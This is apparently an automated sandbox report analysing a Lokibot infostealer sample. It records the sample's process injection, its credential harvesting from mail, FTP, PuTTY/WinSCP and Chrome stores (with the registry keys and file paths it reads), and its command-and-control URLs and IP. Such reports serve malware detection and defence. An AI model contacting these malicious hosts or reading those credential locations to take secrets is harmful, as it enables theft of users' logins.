          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00402630 FindFirstFileA,
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeThread delayed: delay time: 60000
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_00402B7C GetProcessHeap,RtlAllocateHeap,
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_021B0402 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_021B0616 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_021B0706 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_021B0744 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_021B06C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeMemory written: C:\Users\user\Desktop\kVijllv0Yl.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess created: C:\Users\user\Desktop\kVijllv0Yl.exe "C:\Users\user\Desktop\kVijllv0Yl.exe"
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_00406069 GetUserNameW,

          Stealing of Sensitive Information

          barindex
          Yara detected Lokibot
          Source: Yara matchFile source: Process Memory Space: kVijllv0Yl.exe PID: 1292, type: MEMORYSTR
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: kVijllv0Yl.exe PID: 2312, type: MEMORYSTR
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
          Tries to steal Mail credentials (via file registry)
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: PopPassword
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: SmtpPassword
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected Lokibot
          Source: Yara matchFile source: Process Memory Space: kVijllv0Yl.exe PID: 1292, type: MEMORYSTR
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: kVijllv0Yl.exe PID: 2312, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts11
          Native API          		Path Interception1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		2
          OS Credential Dumping          		1
          Account Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
          Process Injection          		2
          Obfuscated Files or Information          		2
          Credentials in Registry          		2
          File and Directory Discovery          		Remote Desktop Protocol2
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Software Packing          		Security Account Manager5
          System Information Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Masquerading          		NTDS11
          Security Software Discovery          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer112
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
          Virtualization/Sandbox Evasion          		LSA Secrets11
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Access Token Manipulation          		Cached Domain Credentials1
          System Owner/User Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items111
          Process Injection          		DCSync1
          Remote System Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          kVijllv0Yl.exe40%VirustotalBrowse
          kVijllv0Yl.exe48%ReversingLabsWin32.Backdoor.Androm
          kVijllv0Yl.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll28%VirustotalBrowse

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.0.kVijllv0Yl.exe.400000.3.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.kVijllv0Yl.exe.400000.1.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.kVijllv0Yl.exe.400000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.2.kVijllv0Yl.exe.1ade0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.2.kVijllv0Yl.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.0.kVijllv0Yl.exe.400000.8.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.0.kVijllv0Yl.exe.400000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.0.kVijllv0Yl.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.kVijllv0Yl.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.0.kVijllv0Yl.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.0.kVijllv0Yl.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.0.kVijllv0Yl.exe.400000.2.unpack100%AviraTR/Patched.Ren.Gen2Download File

          Domains

          SourceDetectionScannerLabelLink
          secure01-redirect.net22%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
          http://alphastand.win/alien/fre.php0%URL Reputationsafe
          http://alphastand.trade/alien/fre.php0%URL Reputationsafe
          http://alphastand.top/alien/fre.php0%URL Reputationsafe
          http://www.ibsensoftware.com/0%URL Reputationsafe
          http://secure01-redirect.net/gc15/fre.php19%VirustotalBrowse
          http://secure01-redirect.net/gc15/fre.php100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          secure01-redirect.net
          		185.185.69.76
          		truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://kbfvzoboss.bid/alien/fre.phptrue
          • URL Reputation: safe
          		unknown
          http://alphastand.win/alien/fre.phptrue
          • URL Reputation: safe
          		unknown
          http://alphastand.trade/alien/fre.phptrue
          • URL Reputation: safe
          		unknown
          http://alphastand.top/alien/fre.phptrue
          • URL Reputation: safe
          		unknown
          http://secure01-redirect.net/gc15/fre.phptrue
          • 19%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://nsis.sf.net/NSIS_ErrorkVijllv0Yl.exefalse
            		high
            http://nsis.sf.net/NSIS_ErrorErrorkVijllv0Yl.exefalse
              		high
              http://www.ibsensoftware.com/kVijllv0Yl.exe, kVijllv0Yl.exe, 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              185.185.69.76
              		secure01-redirect.netRussian Federation
              		35278SPRINTHOSTRUtrue

              Private

              IP
              192.168.2.1

              General Information

              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:562515
              Start date:28.01.2022
              Start time:23:36:03
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 58s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:kVijllv0Yl (renamed file extension from none to exe)
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:21
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@3/6@35/2
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 77.4% (good quality ratio 74.7%)
              • Quality average: 77.1%
              • Quality standard deviation: 28%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
              • HTTP Packets have been reduced
              • TCP Packets have been reduced to 100
              • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200
              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, client.wns.windows.com, fs.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, dual-a-0001.a-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              23:37:15API Interceptor32x Sleep call for process: kVijllv0Yl.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Temp\nsg69F3.tmp

              Download File
              Process:C:\Users\user\Desktop\kVijllv0Yl.exe
              File Type:data
              Category:dropped
              Size (bytes):269906
              Entropy (8bit):7.658711659128666
              Encrypted:false
              SSDEEP:6144:uuOB0r1H5NPCb6yTo0bS2IBEnEwikp46NNVGtf6uGfZghuUYtDw:tr1XaeS0xw5XNVGx0xjH
              MD5:3E44A21AFF425B74994D8A28FFF9B23E
              SHA1:1654662D1C4F390E994D4C858D8B820FE651605C
              SHA-256:8D848BF31B17F081AAFA0AA4535767365C8CC518A8A434776733A06DE10921C9
              SHA-512:AFD4358FCA881DE6C7587C407FC66014FD5A6EB1E3DB604CBBA7F53766141C2C0CC170A0D8B7C066169BC14EFA805A9725FE18A89B6C7A4967DE61E80D941E07
              Malicious:false
              Reputation:low
              Preview:Ld......,................... ....M......fc......4d..........................................................................................................................................................................................................................................J...................j...............................................................................................................................f.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll

              Download File
              Process:C:\Users\user\Desktop\kVijllv0Yl.exe
              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):20992
              Entropy (8bit):5.749135787820481
              Encrypted:false
              SSDEEP:384:Yb6PUQ1aldbpD3HXY0QmwiEiTIYKopaZUb6xhbotKb:YbG1albrXY0HwinMdZeUhbogb
              MD5:C91E53F1A792E1F98CAE5FAF1B3324BD
              SHA1:4CD46871507173B3B4EAB34A2885E76E4D60E32A
              SHA-256:2F51361FFE7DC60A4088469A27E570F22CF655E87720D26626B4E257492739E9
              SHA-512:25AC355D4FB8DD503921B62AA5F869C5805F6909C7079633B5EB4BE9C6094B708D216786AA8D025712558745AEF13A7F3F9FEFA7D5C82BEA44957737E954176C
              Malicious:true
              Antivirus:
              • Antivirus: Virustotal, Detection: 28%, Browse
              Reputation:low
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q...0...0...0...[...0...0..0..Mn...0..Mn...0..Hn...0..Mn...0..Rich.0..................PE..L....g.a...........!.....@...................P............................................@.........................0Q..L...|Q.......`.......................p.......................................................P..0............................text...,>.......@.................. ..`.rdata.......P.......D..............@..@.rsrc........`.......N..............@..@.reloc.......p.......P..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\uyauscropq

              Download File
              Process:C:\Users\user\Desktop\kVijllv0Yl.exe
              File Type:data
              Category:dropped
              Size (bytes):4967
              Entropy (8bit):6.171281725061639
              Encrypted:false
              SSDEEP:96:NPyed2g5U8YofB+TCC1CTHLBiA5CECh5+AU+P6dOuG3xiuoggvX3K:hyyzPfGVCTHLBiA5Ctf+AU+PI1GwuorK
              MD5:6A777038ED583DD539A48B85A672378F
              SHA1:2B24614BD0F041619CBEA3AC3DFCE400C0A7A30B
              SHA-256:D15DA5D9FC537DA388F115A3E951FC44CCD30BB62B0F9131EE1F1B42C8B70413
              SHA-512:48C0BB9A6873B022F561C77BA69C769BB9352CF02B476FFCBB63A14EC8F554FCDA792EFD7203650ABB2877D3E0D4CEF3FA1EF5D46BBD9A5C3ECE002F30257B6E
              Malicious:false
              Reputation:low
              Preview:.....&|.D.14.XDV...X.O..6..X.O..6.DV..6.....DV...F..F.n6.!.....j6.j&..F..F.n6.!.....j6.j&..F..F.n6.!....j6.j&..F..F.n6.!....j6.j&.D~..?.S.Y\...6..j6.j&.|6.D....j6.j..|6.|..n...S.Z..|6..&.n.j6.X.jV.D..S......D.....V..F.Z.F.#.F.2Y.F.2Z.F.P.F.Wv.U.H)|..H)j=..D..F..F.2#|6...j6..V.............D...|V.WP|6.PW,|.^...&|."".X.O..6.|6.|..6.T.|6.|.|..|..j&.|...j6.|6.|.1|..j.|6.|&.|.^...I..p.y....G.....IO..p.O....-.....I.-lp.5....3.....&|.D...X.O..6.6.....n6.j6.D~..U.|6...|6.1j6.|6.)j6.......v.U/|6.S.Z\..j...j5.n6.S.Z...j...j5.S.S.Y\..n...!IO..p....!....j6...n6.!.F..3...j6.D~..U.DV....6.....|6.|.^...&|.D.1.X.O..6.6.....n6.j6.D~..U.|6...|6.1j6.|6.)j6...$...v..Es...|6.S.Z\..j..j5.|6..S.Z...j..j5.|6.S.Z..j..j5.|6...S.#\..j..j=.n6.S.Z...j..j5.S.S.Y\..n...!I..p.....!....j6.D~..U.|6.|..j....F..F..F..F..F..8...j6.D~..U.DV....6.....|6.|.^...&|.D..6.....n6.j6.D~..U.|6...|6.1j6.|6.)j6...S...v.U/|6.S.Z\..j..j5..|6..S.Z...j..j5..S.S.Y\..n...!I.-lp.....!.....j6....F

              C:\Users\user\AppData\Local\Temp\zhi4pk9imnkv3lr

              Download File
              Process:C:\Users\user\Desktop\kVijllv0Yl.exe
              File Type:data
              Category:dropped
              Size (bytes):218255
              Entropy (8bit):7.988008060500998
              Encrypted:false
              SSDEEP:6144:N0r1H5NPCb6yTo0bS2IBEnEwikp46NNVGtf6uGfZghuUe:ur1XaeS0xw5XNVGx0xjV
              MD5:4ABFD766D3D71773430A02F9CDDC33B2
              SHA1:D623A96E0F04A04CB73F632D89263513AB9EA5E4
              SHA-256:5F335EA5F3D9C2FC3E21CAA50C960EEE648BA5988D99490DA32F9A6A4009EEE6
              SHA-512:BD6A540D1884FFCAB7BFE760480474C2BB329F803A413BD143126A66F8184E5566830E4F09BA07F8E24C4476FD5556487519FDC8D73499EE239A1B94E82A0366
              Malicious:false
              Reputation:low
              Preview:.1W{.@K......')V..P#1_x#K.....Q..|.6?..>.`>..x..<....j.[P........d.y."7..<.q..G.................t.o.......:.H..#SuqCw3...n/. ....Q.7{..,6.....~]X<..2._L.\.N.t...O....q~.^[)..K......o.a..]...._FS.4.........2.N...x...00.....1Yzp..J@.v...... +...~:.{V@V~......P'....P#1.j.K........|{6?..>..>..xB.<......P..<.T .`...5.6X..<N?.6).P..1.....h.T..].?..D..8.....&.sk.8SuqCw3..R..K8...,....U.H.)..99z...Z....Q...2..h..6.h[..y..D.....\...9.@.X\.1...*.J...T...2n........n`.2y...fRL..xzp.m.{..]...Xn.+...~:.{s@K..........X.9K#1.l#K.B....Q...P6?..>.`>..x.........#P..s. .\...8.6.7..N?/6).P..1............?..D..8....&7IW.8SuqCw3..R..K8...,....U.H.)..99z...Z....Q...2..h..6.h[..y..D.....\...9.@.X\.1.........T...2n........n`.2y...f...1Yzp...@.....K..+...~:.{s@K........'.V..P#1.x#K.....Q..|.6?..>.`>..x..<....j..P..<.. ....5.6....N?/6).P..1.....h.T....?..D..8...~.&7sk.8SuqCw3..R..K8...,....U.H.)..99z...Z....Q...2..h..6.h[..y..D.....\...9.@.X\.1.........T...2n........n`.2y...f

              C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

              Download File
              Process:C:\Users\user\Desktop\kVijllv0Yl.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:high, very likely benign file
              Preview:1

              C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\21c8026919fd094ab07ec3c180a9f210_d06ed635-68f6-4e9a-955c-4899f5f57b9a

              Download File
              Process:C:\Users\user\Desktop\kVijllv0Yl.exe
              File Type:data
              Category:dropped
              Size (bytes):49
              Entropy (8bit):1.2701062923235522
              Encrypted:false
              SSDEEP:3:/l1PL3n:fPL3
              MD5:CD8FA61AD2906643348EEF98A988B873
              SHA1:0B10E2F323B5C73F3A6EA348633B62AE522DDF39
              SHA-256:49A11A24821F2504B8C91BA9D8A6BD6F421ED2F0212C1C771BF1CAC9DE32AD75
              SHA-512:1E6F44AB3231232221CF0F4268E96A13C82E3F96249D7963B78805B693B52D3EBDABF873DB240813DF606D8C207BD2859338D67BA94F33ECBA43EA9A4FEFA086
              Malicious:false
              Preview:........................................user.

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):7.9269620673373185
              TrID:
              • Win32 Executable (generic) a (10002005/4) 92.16%
              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:kVijllv0Yl.exe
              File size:247353
              MD5:6997de404fb7e798aecc2c8a14fd2f12
              SHA1:121a437542ba544f975847429dda439719800bb9
              SHA256:f36a543cfcddf76b99df925bf70b22d560792d1059387e00bfe782bffd6e8a2b
              SHA512:bb3fe544bdf9770bbb9864d9e14daa68d8357a91d06f33f90b7165467c608b9a2fd46009b37f4d914112d18acceaaa1cd3e2df92db65ec0f1bc20b41a020faa5
              SSDEEP:3072:oNyah0mJo4m2pkC3Z4FRH8aVAW3dxaj0ubNDHgJiLwYePSCfPrpAfZSQme11lz:owkZN3KRHXA0ajnHXYPbfjKxce1bz
